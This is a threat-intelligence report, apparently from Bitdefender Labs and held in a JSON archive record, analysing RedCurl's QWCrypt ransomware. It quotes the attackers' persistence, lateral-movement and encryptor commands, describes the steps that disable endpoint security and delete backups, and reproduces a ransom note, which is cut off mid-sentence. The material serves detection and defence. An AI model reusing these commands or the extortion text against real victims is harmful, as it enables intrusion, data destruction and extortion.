{ "id": "f67bda93-1ead-4aa2-a317-8e1d734dd68a", "created_at": "2026-04-06T00:10:01.181053Z", "updated_at": "2026-04-10T13:12:17.262865Z", "deleted_at": null, "sha1_hash": "e83136e0de330e727cf98f00e40c410e2138a9b9", "title": "RedCurl's Ransomware Debut: A Technical Deep Dive", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 358928, "plain_text": "RedCurl's Ransomware Debut: A Technical Deep Dive\r\nBy Martin Zugec\r\nArchived: 2026-04-05 17:59:50 UTC\r\nThis research, conducted by Bitdefender Labs, presents the first documented analysis of a ransomware campaign\r\nattributed to the RedCurl group (also known as Earth Kapre or Red Wolf). RedCurl has historically maintained a\r\nlow profile, relying heavily on Living-off-the-Land (LOTL) techniques for corporate cyber espionage and data\r\nexfiltration. This shift to ransomware marks a significant evolution in their tactics.\r\nThis new ransomware, which we have named QWCrypt based on a self-reference 'qwc' found within the\r\nexecutable, is previously undocumented and distinct from known ransomware families.\r\nBy sharing our findings with the threat intelligence community and challenging existing assumptions, we hope to\r\nencourage further research of this unconventional threat actor that has been active since 2018.\r\nRedCurl: A (Red) Wolf in Sheep's Clothing?\r\nRedCurl's motivations raise more questions than answers. While frequently labeled a cyberespionage group, we\r\nfind the evidence supporting this classification inconclusive.\r\nMuch of the existing analysis from fellow security researchers reiterates the cyberespionage claim, primarily\r\nfocusing on technical aspects. While technical analysis is crucial, we believe it's equally important to examine\r\ntheir business model and the true motivations behind their actions for a complete operational picture.\r\nTraditionally, cyberespionage is the domain of state-sponsored actors, the APTs. Our telemetry has identified\r\nvictims primarily in the United States, but also in Germany, Spain, and Mexico. Other researchers however\r\nreported targets in Russia, a broad geographical scope atypical for state-sponsored groups.\r\nData exfiltration, a common tactic in ransomware operations, is typically employed for extortion. Yet, we have\r\nfound no historical evidence (until now) of RedCurl attempting to sell stolen data back to their victims, an unusual\r\ndeviation. Furthermore, financially motivated groups rarely prioritize the theft of proprietary information for\r\ncompetitive advantage; we struggle to identify a comparable group.\r\nThe group's revenue generation and operational objectives remain shrouded in mystery, particularly given their\r\nsustained activity since 2018. Consequently, their business model and true motivations remain unclear.\r\nHypothesis 1: Gun-For-Hire\r\nGiven the anomalies in RedCurl's behavior, we find it necessary to introduce a purely speculative hypothesis. It's\r\npossible that RedCurl operates as a 'gun-for-hire' group, essentially cyber mercenaries. This would explain their\r\ndiverse victimology and the lack of a clear, consistent operational pattern. Furthermore, this hypothesis could\r\npotentially explain their current interest in ransomware that targets infrastructure, rather than endpoint computers.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 1 of 21\n\nIn a mercenary model, ransomware could serve as a diversion, masking the true objective: a targeted data\r\nexfiltration operation. It's also possible that RedCurl, having completed a data exfiltration contract, was not paid,\r\nleading them to use ransomware as an alternate way to monetize their access.\r\nHypothesis 2: Discreet Operations\r\nRedCurl's surprising introduction of hypervisor encryption, while maintaining network gateway functionality and\r\navoiding endpoint encryption, suggests a deliberate effort to limit the attack's impact to the IT department. This\r\nstrategy, if intentional, posits that RedCurl prioritizes discreet, direct negotiations with victims, minimizing public\r\nattention.\r\nThe absence of publicly visible ransom demands, such as through a dedicated leak site (DLS), does not\r\nnecessarily indicate that RedCurl is not directly approaching victims. It is plausible that they engage in private\r\nnegotiations, further reinforcing their preference for discreet operations and explaining their lack of public victim\r\nannouncements.\r\nSuch an approach enables extended, low-profile operations, ensuring consistent revenue across a broad client base\r\nand reducing their visibility to law enforcement. This hypothesis contrasts with the mercenary model, suggesting\r\nthat RedCurl avoids public disclosure as a core operational strategy since 2018.\r\nThis hypothesis is further supported by recent industry trends. Our 2023 Cybersecurity Assessment Report\r\nrevealed 42% of respondents reporting pressure to conceal security breaches. Alarmingly, our upcoming 2024\r\nreport indicates this trend has worsened, showing an increase in concealed breaches.\r\nInitial Access\r\nRedCurl has traditionally relied on social engineering and spear-phishing to gain initial access to targets. In its\r\nlatest ransomware deployment, the initial infection vector remains consistent with previous RedCurl campaigns:\r\nphishing emails containing IMG files disguised as CV documents.\r\nAn IMG file is essentially a sector-by-sector copy of a storage device, like a virtual disk. When a victim clicks on\r\nthe IMG file attached to the phishing email, Windows 10 and 11 have native support to automatically mount it as a\r\nvirtual drive. With default configuration, Windows will also automatically open the mounted disk, displaying its\r\ncontents in File Explorer. This is when the victim will see the file called 'CV APPLICANT 7802-91542.SCR'.\r\nNow, here's a little secret most folks don't know: screensaver ('.SCR') files are really just renamed executables.\r\nWhen you double-click a '.SCR' file, Windows treats it like an executable, but with an additional '/S' parameter,\r\ntelling it to run in the fullscreen mode. And here's the fun part: this works both ways. You can absolutely rename a\r\n'.SCR' file to '.EXE' and run it (though you'd need to include the '/S' parameter). But, just as easily, you can\r\nrename any '.EXE' file to '.SCR', and Windows will happily execute it. It'll just add that '/S' parameter, which\r\nwon't do anything unless the executable is designed for it.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 2 of 21\n\nScreensaver (.SCR) files are just renamed executables\r\nCV APPLICANT 7802-91542.SCR is just a renamed copy of a legitimate Adobe executable,\r\nADNotificationManager.exe, and this Adobe executable is vulnerable to DLL sideloading.\r\nWhen an application starts, it often loads libraries (DLLs) to perform various functions. If an attacker can place a\r\nmalicious DLL with the same name as a legitimate one in the same folder as the application, the application will\r\nload the malicious one instead (read our tech explainer for more details about this technique).\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 3 of 21\n\nDLL sideloading and order execution hijacking \r\nThat's exactly what's happening here. When the victim clicks on that '.SCR' file (which, remember, is just a\r\nrenamed '.EXE'), Windows executes it. And because of that DLL sideloading vulnerability, it automatically loads a\r\nlibrary containing malicious code named netutils.dll from the same folder.\r\nAfter execution, the netutils.dll immediately launches a ShellExecuteA call with the open verb, directing the\r\nvictim's browser to https://secure.indeed.com/auth. This displays a legitimate Indeed login page, a calculated\r\ndistraction designed to mislead the victim into thinking they are simply opening a CV. This social engineering\r\ntactic provides a window for the malware to operate undetected.\r\nSimultaneously, netutils.dll acts as a downloader. Preliminary analysis of the netutils.dll downloader revealed\r\nother recurring characteristics observed in prior RedCurl campaigns, including the implementation of encrypted\r\nstrings decrypted via bcrypt.dll. It uses wininet.dll functions to retrieve the final payload from the domain\r\nfall[.]dropconnect[.]workers[.]dev, using a custom user agent: 'Mozilla/5.0 (Windows NT; Windows NT 10.0;)\r\nWindowsPowerShell/5.1.20134.790 (tQZyWLKnigaURyRIrnRG)'.\r\nThis final payload is stored in %APPDATA%\\BrowserSpec\\BrowserSpec_\u003cbase64 representation of the\r\nhostname\u003e.dll. To establish persistence, a scheduled task named \\BrowserSpec\\BrowserSpec_\u003cbase64\r\nrepresentation of the hostname\u003e is created. This scheduled task executes the final payload indirectly with the\r\nfollowing commandline: C:\\Windows\\system32\\pcalua.exe -a rundll32 -c shell32.dll,Control_RunDLL C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\BrowserSpec\\BrowserSpec_.\u003cbase64 representation of the hostname\u003e.dll hard-wired-displacement\r\nThis command line is a classic example of Living Off The Land (LOTL) techniques, a common tactic in modern\r\ncyberattacks (and remember, we've got a Tech Explainer on LOTL if you want to dive deeper.) Basically, it's about\r\nusing legitimate system tools to carry out malicious actions, making it harder for defenders to spot the bad stuff.\r\nC:\\Windows\\system32\\pcalua.exe: Our first LOTL component is pcalua.exe, the Program Compatibility Assistant\r\n(PCA) utility. It's designed to help older programs run on newer versions of Windows, think of it as a\r\ncompatibility wrapper. It can be abused for proxy execution of binaries.\r\n-a rundll32: This tells pcalua.exe to launch rundll32.exe, another LOTL utility. Rundll32.exe is a Windows\r\nutility used to run DLLs (Dynamic Link Libraries). It's a legitimate tool, but it can be abused to run\r\nmalicious DLLs.\r\n-c shell32.dll,Control_RunDLL C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\BrowserSpec\\BrowserSpec_\u003cbase64\r\nrepresentation of the hostname\u003e.dll: This specifies the DLL (shell32.dll) and the function within that DLL\r\n(Control_RunDLL) that rundll32.exe should call.\r\nThe -c switch, when used with pcalua.exe in this context, effectively designates everything that\r\nfollows it as the command-line parameters that are passed to the executable being launched\r\n(rundll32.exe).\r\nControl_RunDLL is a function within shell32.dll (another LOTL component) that's designed to\r\nlaunch control panel applets. However, it can be abused to execute binaries.\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\BrowserSpec\\BrowserSpec_\u003cbase64 representation of the\r\nhostname\u003e.dll This is the only malicious component in this command line. This is RedCurl's custom\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 4 of 21\n\nDLL, the payload they want to execute. The base64 encoding of the hostname is used to make the\r\nname unique to each compromised host.\r\nhard-wired-displacement This is the name of the DLL function to call from the malicious library.\r\nThis backdoor, a straightforward but reliable tool, acts as their main entry point. Other security researchers have\r\npreviously documented it under names like RedCurl.Downloader or Earth Kapre downloader. Since our research\r\nis focused on the first documented instance of ransomware in RedCurl operations, we won't rehash the well-known behaviors of this malware that have already been covered.\r\nLateral Movement\r\nOnce RedCurl establishes their initial foothold, their focus shifts to navigating the network, gathering intelligence,\r\nand escalating their access.\r\nWith access to compromised user accounts across multiple systems, RedCurl used WMI to run commands on\r\nother computers. When they run commands remotely, they stick to built-in Windows tools. They don’t bring in\r\nany external tools, only rely on the LOTL techniques and use regular Windows tools like powershell.exe,\r\nwmic.exe, certutil.exe, or tasklist.exe.\r\nAnalysis revealed the use of a pentesting tool that used techniques mirroring those found in both the older,\r\ndeprecated wmiexec-RegOut and the current wmiexec-Pro projects. This modified wmiexec is interesting because\r\nit only requires port 135 to function, bypassing the need for an SMB connection, which is often monitored by\r\nsecurity tools. This tool outputs command results into files in C:\\Windows\\Temp\\\u003c6 random letters\u003e or directly\r\ninto the Windows Registry.\r\nA sample of these commands can be found below:\r\ncmd.exe /Q /c powershell -c \"Enable-PSRemoting -force\" 1\u003e \\\\Windows\\\\Temp\\\\VSoNLA 2\u003e\u00261\r\ncmd.exe /Q /c tasklist | find /I \"outlook\" 1\u003e \\\\Windows\\\\Temp\\\\pgkVdT 2\u003e\u00261\r\ncmd.exe /Q /c echo wmic process get Name,Commandline ^\u003e\r\n\\\\\\\\N_b18353ea8eea835eb48cf281b2f632c6\\\\C$\\\\UGxqYI 2^\u003e^\u00261 \u003e C:\\\\Windows\\\\TEMP\\\\ABFHtO.bat \u0026\r\nC:\\\\Windows\\\\system32\\\\cmd.exe /Q /c C:\\\\Windows\\\\TEMP\\\\ABFHtO.bat \u0026 C:\\\\Windows\\\\system32\\\\cmd.exe\r\n/Q /c del C:\\\\Windows\\\\TEMP\\\\ABFHtO.bat\r\ncmd.exe /Q /c dir C:\\\\users 1\u003e C:\\\\windows\\\\temp\\\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt 2\u003e\u00261 \u0026\u0026\r\ncertutil -encodehex -f C:\\\\windows\\\\temp\\\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt\r\nC:\\\\windows\\\\temp\\\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt 0x40000001 \u0026\u0026 for /F \"usebackq\" %G in\r\n(\"C:\\\\windows\\\\temp\\\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt\") do reg add\r\nHKLM\\\\Software\\\\Classes\\\\evOFVQ /v ac77f6d6-74ce-4110-95e0-4ec2408968f2 /t REG_SZ /d \"%G\" /f \u0026\u0026 del\r\n/q /f /s C:\\\\windows\\\\temp\\\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt C:\\\\windows\\\\temp\\\\a793c84d-5993-\r\n4dcb-bc19-ff838eb70137.txt\r\nWe also observed the use of Chisel, a fast TCP/UDP tunnel over HTTP. We suspect it was used for RDP access.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 5 of 21\n\nWe've seen RedCurl stick to their usual playbook in most cases, continuing with data exfiltration over longer\r\nperiods of time. However, one case stood out. They broke their routine and deployed ransomware for the first\r\ntime.\r\nRansomware Deployment\r\nThe ransomware incident we observed with RedCurl stands out. Beyond the questions surrounding their\r\nmotivation, their targeting strategy is also noteworthy. While most ransomware groups deploy their payloads\r\nacross all endpoints (often using GPO or PsExec), and some extend to hypervisors, RedCurl targeted only\r\nhypervisors.\r\nThis focused targeting can be interpreted as an attempt to inflict maximum damage with minimum effort. By\r\nencrypting the virtual machines hosted on the hypervisors, making them unbootable, RedCurl effectively disables\r\nthe entire virtualized infrastructure, impacting all hosted services. Interestingly, they deliberately excluded specific\r\nVMs that acted as network gateways, demonstrating their familiarity with the network implementation. The batch\r\nscripts used to launch the attack contained hardcoded information about the environment, including machine\r\nnames, further indicating a highly targeted operation.\r\nBy keeping network gateways operational and avoiding endpoint encryption, RedCurl may have aimed to confine\r\nthe attack to the IT team, preventing widespread disruption and user awareness.\r\nLauncher Script\r\nThe ransomware, named rbcw.exe, was deployed from an encrypted 7z archive. The archive was extracted to the\r\nC:\\ProgramData directory using the 7-Zip executable (7za.exe) using the command C:\\ProgramData\\7za.exe x -\r\naoa –p BSoQ7N0H5...... C:\\ProgramData\\a753506f51fc2.tmp.\r\nExecution was initiated through custom-crafted batch files, specifically tailored to the victim's environment. The\r\ninitial batch file, a753506f51fc.bat was executed by the command cmd.exe /c C:\\ProgramData\\a753506f51fc.bat -\r\n-pass BSoQ7N0H5...... --main a753506f51fc --key \u003ckey\u003e --timeout -7793. The primary function of the\r\na753506f51fc.bat batch file is to disable Windows Defender before initiating the next script in the sequence script.\r\nWhile we cannot definitively confirm the existence of separate scripts tailored for other endpoint security\r\nsolutions, our investigation revealed multiple indications of RedCurl attempting to bypass a variety of security\r\nproducts. The batch file has multiple references executable Term.exe. This executable is linked to a PDB file\r\nnamed \"Terminator_v1.1,\" potentially associated with a known 'bring your own vulnerable driver' (BYOVD)\r\ndriver. BYOVD leverages legitimate, but vulnerable, drivers to elevate privileges and disable security software.\r\nFurthermore, the ransomware configuration file contains explicit exclusions for several endpoint security\r\nsolutions, including Windows Defender, Malwarebytes, VIPRE Business Agent, Bitdefender, and SentinelOne.\r\nMain Script\r\nFollowing the initial stage of disabling endpoint security, the a753506f51fc.bat script proceeds to execute the\r\nscript responsible for launch the ransomware encryption process (rnm.bat or rn.bat) using command line cmd.exe\r\n/c C:\\\\ProgramData\\\\rnm.bat --pass BSoQ7N0H5...... --main a753506f51fc --key \u003ckey\u003e.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 6 of 21\n\nThe scripts begin by parsing command-line arguments to retrieve critical parameters: the decryption password\r\n(tpass), the main executable name (tmain), and the encryption key (tkey).\r\nThe scripts then configure variables for remote logging and data exfiltration. The davstr variable defines the\r\nWebDAV URL for remote file storage, and the slog and spass variables store the credentials for accessing this\r\nremote location. Notably, an attempt to upload files using PowerShell is present but commented out, replaced with\r\ncurl.exe for data transfer. This suggests the attackers may have encountered issues with PowerShell execution or\r\npreferred the reliability of curl.\r\nA key aspect of these scripts is their customization for specific victims. The script includes conditional blocks that\r\nperform targeted backup deletion based on the hostname. For example, on one Hyper-V host, the script removes\r\nspecific backup directories and virtual hard disk files.\r\nBefore initiating the encryption, the script performs several system reconnaissance and cleanup tasks. It stops and\r\ndeletes the Term service, which is associated with the term.exe process, likely used for disabling endpoint security.\r\nThe script then captures system information, including running processes and logical disk details, and logs it to\r\nfiles within a temporary directory (%ALLUSERSPROFILE%\\temp_3a3352baf).\r\nThe core encryption routine is then executed. The ransomware encryptor, rbcw.exe, is executed twice for virtual\r\nmachines (--hv switch), and twice for host itself, four times in total.\r\nThe commands used were:\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_1.log 2\u003e\u00261\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_2.log 2\u003e\u00261\r\nrbcw.exe --key %tkey% --nosd \u003e%tdir%\\%computername%_rbcw_1.log 2\u003e\u00261\r\nrbcw.exe --key %tkey% \u003e%tdir%\\%computername%_rbcw_2.log 2\u003e\u00261\r\nLet’s break down these commands:\r\nrbcw.exe: This is the ransomware executable itself.\r\n--hv: This flag indicates that the ransomware should target Hyper-V virtual machines.\r\n--excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\": This option specifies a comma-separated\r\nlist of virtual machines to exclude from encryption, in this case, the network gateways.\r\n--key %tkey%: This argument provides the encryption key, which is dynamically passed from the\r\npreceding batch file.\r\n--nosd: This flag instructs the ransomware not to self-delete after encryption.\r\n\u003e%tdir%\\%computername%_rbcw_*.log 2\u003e\u00261: These parts redirect the ransomware's output and error\r\nmessages to log files within the temporary directory.\r\nThis double execution, combined with the two separate log files, indicates a deliberate attempt to ensure complete\r\nencryption or to gather debug information for further development. Files are not encrypted twice due to checks\r\nagainst the .randombits extension, the double execution likely aims to catch any files missed during the initial\r\npass.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 7 of 21\n\nNotice the lack of the --nosd flag on the very last command, instructing the ransomware encryptor to self-delete\r\nafter the execution.\r\nFinally, the script cleans up after itself by deleting the ransomware executable, supporting tools, and temporary\r\nfiles. This thorough cleanup aims to minimize the attackers' footprint and complicate forensic analysis. The batch\r\nfiles exhibit a high degree of polish and customization, further indicating a sophisticated threat actor with a deep\r\nunderstanding of the victim's environment.\r\nRansomware Encryptor Analysis   \r\nThe ransomware binary, rbcw.exe, is a UPX-packed Go executable. Notably, this ransomware strain is novel; our\r\nanalysis did not reveal any similar samples or known ransomware families. After unpacking, the binary is\r\nobfuscated, but the command-line options --help and /h provide a clear overview of the ransomware's features.\r\n-k, --key string\r\nThis argument provides the encryption key, which is essential for the ransomware to function.\r\nWithout this key, the ransomware will not encrypt any files. This key is used to generate the\r\nXChaCha20-Poly1305 key used to decrypt the configuration data, which includes the ransom note.\r\n--folder stringArray\r\nThis switch defines the folders to search for files to encrypt. The default value is \"all,\" indicating\r\nthat the ransomware will search all accessible folders.\r\n--nosd\r\nThis flag instructs the ransomware not to self-delete after encryption. Without this flag, the\r\nransomware will delete itself after completing its operations.\r\n--noshadowdelete\r\nThis switch stops the ransomware from deleting shadow copies.\r\n--hv\r\nThis flag enables Hyper-V VM encryption. When present, the ransomware will encrypt virtual\r\nmachines running on the current host.\r\n--excludeVM string\r\nThis option specifies a comma-separated list of virtual machines (VMs) to exclude from encryption.\r\n--kill\r\nThis switch is used to kill VM processes.\r\n--full-enc-less string\r\nThis option specifies the maximum file size for full encryption. Files smaller than this size will be\r\nfully encrypted, while larger files may be partially encrypted. The default value is \"50M,\" indicating\r\n50 megabytes.\r\n--skip-count int\r\nThis switch allows the ransomware to skip a certain number of blocks during encryption. The\r\ndefault is 5.\r\nInstead of encrypting every consecutive block of data within a file, the ransomware skips a defined\r\nnumber of blocks, leaving portions of the original file unencrypted. By using partial encryption,\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 8 of 21\n\nransomware can significantly speed up the encryption process but also avoid detection by some\r\ndetection mechanisms.\r\n--minsize string\r\nThis switch is used to set the minimum file size to encrypt.\r\n--maxsize string\r\nThis switch is used to set the maximum file size to encrypt.\r\n--block-size string\r\nThis switch defines the AES block size used during encryption. The default value is \"1M,\"\r\nindicating a 1 megabyte block size. This parameter allows the attackers to adjust the performance of\r\nthe encryption process.\r\n--chacha\r\nThis flag enables the use of the ChaCha20 algorithm for encryption. If this switch is not present, the\r\nransomware defaults to AES encryption.\r\n--dryrun\r\nThis switch enables a \"dry run\" mode, where the ransomware simulates the encryption process\r\nwithout actually modifying any files.\r\n-h, --help\r\nThis switch displays the help information, listing all available command-line options and their\r\ndescriptions.\r\n-i, --info\r\nThis switch prints system information to the console or log file. This is likely used for\r\nreconnaissance purposes, providing the attackers with details about the compromised system.\r\n--log string\r\nThis option specifies the path to the log file, where the ransomware will record its activities.\r\n--threads int\r\nThis option specifies the number of threads to use during encryption. The default value is 10. This\r\nparameter allows the attackers to adjust the performance of the encryption process.\r\n--turnoff\r\nThis switch turns off Hyper-V VMs. The default is true.\r\n-v, --verbose\r\nThis flag enables verbose output mode, providing more detailed information about the ransomware's\r\nactivities.\r\nThe --key command-line switch is critical for the rbcw.exe functionality, because it also decrypts the ransomware's\r\nconfiguration file. This configuration includes the ransom note. This dependency on the key also presents\r\nchallenges for analysis, as without knowing it, researchers cannot directly access the configuration.\r\nAn interesting detail is the presence of a hardcoded personal ID within the ransom note. This ID is not arbitrary;\r\nit's likely the key to a unique RSA key pair, with the corresponding public key embedded within the ransomware's\r\nconfiguration. This implies that the attackers maintain a matching private key, required for decrypting the victim's\r\nfiles. Therefore, the personal ID acts as a unique identifier, directly connecting the victim to their specific\r\ndecryption key.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 9 of 21\n\n-----BEGIN      RSA      PUBLIC      KEY-----  \r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvYOTAPKPqDh4tmHDlwnE\r\n+ZzXvIDoAci3RnrZ5U+ufN8DIC2aKw5/c96A5icvtHHZZaRUIMEoug0RLOVmZ2Xb\r\n28Wj4WvR4b+i+OC2bOQzMuMv86lhEGa6gD0k3Hk0QkVGjwM+9wtaBSWiePA4xsNC\r\nK66g0Uf4rB8zIpx/1hHlWxsTgKUoOObXiBc5XuhqoUHUkyEfy3TFPHprdetf0CLo\r\nf+NWUnjp2fuUyVZFSEvaCHd3lw5WeqbcQg+CukGnXgcJ5QP3ubgWHATagLKflFv3\r\nqbGLiMNuQYUVJ0Cqc4YlZOVlbkyOJvsCekFZtciD5SEipLMeWC955wI8xGKeZuK2  \r\nHQIDAQAB \r\n-----END   RSA   PUBLIC   KEY----- \r\nRansomware Note Analysis\r\nAnalysis of the ransom note reveals that it is not an original creation. Instead, it is composed of sections taken\r\nfrom the ransom notes of other known ransomware groups, including LockBit, HardBit, and Mimic group. This\r\npractice of repurposing existing ransom note text raises questions about the origins and motivations of the\r\nRedCurl group. Notably, there is no known dedicated leak site (DLS) associated with this ransomware, and it\r\nremains unclear whether the ransom note represents a genuine extortion attempt or a diversion.\r\nConclusion and Recommendations\r\nThe RedCurl group's recent deployment of ransomware marks a significant evolution in their tactics. This\r\ndeparture from their established modus operandi raises critical questions about their motivations and operational\r\nobjectives. The highly targeted nature of the ransomware attack shows a well-planned and executed operation.\r\nTo mitigate the risk of ransomware attacks similar to the one deployed by RedCurl, and aligning with the insights\r\nprovided in Bitdefender's Ransomware Whitepaper, we recommend the following:\r\n1. Multilayered Defense: Adopting a multilayered security approach is essential. Organizations should invest in a\r\ndiverse range of security controls, including network segmentation and endpoint protection to create overlapping\r\nlayers of defense against cyber threats.\r\n2. Detection and Response: Despite your best efforts, it is still possible that modern threat actors will make it past\r\nyour prevention and protection controls. This is where your detection and response capabilities come into play.\r\nWhether you get these capabilities as-a-product (EDR/XDR) or as-a-service (MDR), the purpose is to minimize\r\nthe time when threat actors remain undetected. Bitdefender MDR team conducts a proactive search through an\r\nenvironment to hunt malicious, suspicious, or risky activities that have evaded detection by existing tools. Use\r\nbehavioral analysis and anomaly detection to identify suspicious activities, such as unusual tunneling via tools like\r\nchisel or remote execution with wmiexec-RegOut.\r\n3. Prioritize Living-off-the-Land (LOTL) Prevention: Almost all modern cybercriminals abuse legitimate system\r\ntools for malicious purposes, focus on preventing and detecting LOTL attacks. Implement strict application\r\ncontrol to limit the execution of unauthorized scripts and binaries, even those signed by trusted vendors. Harden\r\nPowerShell and other scripting environments by enforcing execution policies and enabling enhanced logging.\r\nMonitor for unusual process executions and command-line arguments, as RedCurl leverages tools like curl.exe\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 10 of 21\n\nand wmic.exe for malicious activities. Additionally, restrict administrative privileges and implement least-privilege principles to limit the impact of compromised accounts.\r\n4. Enhance Data Protection and Resilience: While backups are often considered a core defense against\r\nransomware, they are usually less effective than assumed due to malicious targeting. Implement immutable\r\nbackups, isolated from the production network, and regularly test recovery procedures. Exercise caution with\r\nbackup solutions that rely on Shadow Volume Copies, as these are frequently targeted and deleted by ransomware,\r\nas evidenced by RedCurl's default deletion of shadow volumes. Encrypt sensitive data at rest and in transit to\r\nminimize data breach impacts.\r\n5. Advanced Threat Intelligence: The right threat intelligence solutions can provide critical insights about\r\nattacks. Bitdefender IntelliZone consolidates all the information we've gathered about RedCurl operations. If you\r\nalready have an Intellizone account you can find additional structure information under Threat ID BD9ys7c9na. \r\nBy implementing these recommendations, organizations can strengthen their defenses and better protect against\r\nthe evolving threat landscape posed by sophisticated cyber adversaries.\r\nWe would like to thank Stefan Ioja, Adrian Schipor, Victor Vrabie, and Bogdan Zavadovschi for help with putting\r\nthis advisory report together.   \r\nIndicators of Compromise\r\nFiles\r\n%AppData%\\Roaming\\BrowserSpec\\BrowserSpec_\u003chostname\r\nin base64\u003e.dll\r\na806df529a111fb453175ecdcb230d96\r\n%AppData%\\Roaming\\temp95\\lzp.py f19542732c33f1b908365df02a86105c\r\nC:\\ProgramData\\ a744bef51.bat ca1b05b97e934511a76a744b53b8eb92\r\nC:\\ProgramData\\ a753506f51fc.bat N/A\r\nC:\\ProgramData\\ rbcw.exe 27927a73b8273dc796ddfc309ec8ecaf\r\nC:\\ProgramData\\ rn.bat 6495356afd05dbf8661af13ef72ab887\r\nC:\\ProgramData\\ rnfin.bat c41957f965f8c38b6cedf44b62b09298\r\nC:\\ProgramData\\ rnm.bat 09735d305b7d6f071173fe3b62b46d9e\r\nC:\\ProgramData\\ unideq.dll 4154c3553656e94575aeb7183969bfa0\r\nC:\\ProgramData\\ unimac.exe 5f2c5f7620b74d183e206817b723b555\r\nC:\\ProgramData\\ unireq.exe 8d56ac580c06baac327613202fdbf5eb\r\nC:\\ProgramData\\ unisap.dll add1bfb2d4b4ad083dcee40d61a12780\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 11 of 21\n\nC:\\ProgramData\\7za.exe fde874e8d442e3f0469b3d2f86a45739\r\nC:\\ProgramData\\term.exe\r\nbc469bcdb585d8e6576fc664a6404a82,\r\nab2d6846430b8ea18fc08cb7804fce99,\r\ne58e5afa9a94ba474e465dbf919d2c51\r\nC:\\ProgramData\\term.sys N/A\r\nC:\\temp\\chisel-garble-win-x64-v2.0_upx.exe fd3fd2f6cde9e38e92433c152892c03d\r\nC:\\Windows\\system32\\gdiplus.exe d00c86ea42958f919c702a9a416a24ce\r\nCV APPLICANT 7802-91542.SCR 9f7b1afce9c8c7d9282c5e791c69e369\r\nURLS\r\nhxxps://my[.]powerfolder[.]com/webdav/utils/elzp[.]txt\r\nhxxps://mia[.]nl[.]tab[.]digital/remote[.]php/dav/files/\r\nScheduled Tasks\r\n\\\\BrowserSpec\\\\BrowserSpec_\u003chostname in base64\u003e\r\nAppendices\r\nRansom Note\r\nPERSONAL_ID: 329BCF07-85F2-49A7-97C3-5D7DA04FB9E3\r\n\u003e\u003e\u003e\u003e\u003e Your data is stolen and encrypted.\r\nIf you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data\r\nappears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time.\r\nThe sooner you pay the ransom, the sooner your company will be safe.\r\n\u003e\u003e\u003e\u003e\u003e What are the dangers of leaking your company's data.\r\nFirst of all, you will receive fines from the government such as the GDRP and many others, you can be sued by\r\ncustomers of your firm for leaking information that was confidential. Your leaked data will be used by all the\r\nhackers on the planet for various unpleasant things. For example, social engineering, your employees' personal\r\ndata can be used to re-infiltrate your company. Bank details and passports can be used to create bank accounts and\r\nonline wallets through which criminal money will be laundered. On another vacation trip, you will have to explain\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 12 of 21\n\nto the FBI where you got millions of dollars worth of stolen cryptocurrency transferred through your accounts on\r\ncryptocurrency exchanges. Your personal information could be used to make loans or buy appliances. You would\r\nlater have to prove in court that it wasn't you who took out the loan and pay off someone else's loan. Your\r\ncompetitors may use the stolen information to steal technology or to improve their processes, your working\r\nmethods, suppliers, investors, sponsors, employees, it will all be in the public domain. You won't be happy if your\r\ncompetitors lure your employees to other firms offering better wages, will you? Your competitors will use your\r\ninformation against you. For example, look for tax violations in the financial documents or any other violations,\r\nso you have to close your firm. According to statistics, two thirds of small and medium-sized companies close\r\nwithin half a year after a data breach. You will have to find and fix the vulnerabilities in your network, work with\r\nthe customers affected by data leaks. All of these are very costly procedures that can exceed the cost of a\r\nransomware buyout by a factor of hundreds. It's much easier, cheaper and faster to pay us the ransom. Well and\r\nmost importantly, you will suffer a reputational loss, you have been building your company for many years, and\r\nnow your reputation will be destroyed.\r\n\u003e\u003e\u003e\u003e\u003e How to decrypt data?\r\nContact our Support Team by email: edgypsin@proton.me (insert your PERSONAL_ID at SUBJECT field) and\r\nwait for an answer, we'll guarantee a response. Sometimes you will have to wait some time for our reply, this is\r\nbecause we have a lot of work and we attack hundreds of companies around the 